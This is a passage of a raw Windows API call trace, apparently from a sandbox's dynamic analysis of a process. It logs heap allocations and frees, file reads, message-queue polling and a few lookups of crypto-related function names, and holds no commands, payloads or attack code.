hTemplateFile=0x0) returned 0x158 [0198.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0198.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.679] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0198.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0198.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0198.680] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.680] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.680] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.681] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.681] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x425e, lpOverlapped=0x0) returned 1 [0198.683] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x425e) returned 0x900190 [0198.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x425e) returned 0xbea018 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x425e) returned 0x900190 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0198.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0198.685] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.685] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0198.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0198.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x425e) returned 0x900190 [0198.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27e8 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0198.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x425e) returned 0xbee280 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0198.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.687] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0198.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0198.687] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0198.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0198.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.687] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0198.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0198.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0198.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0198.688] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0198.689] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0198.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0198.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.690] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0198.691] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: 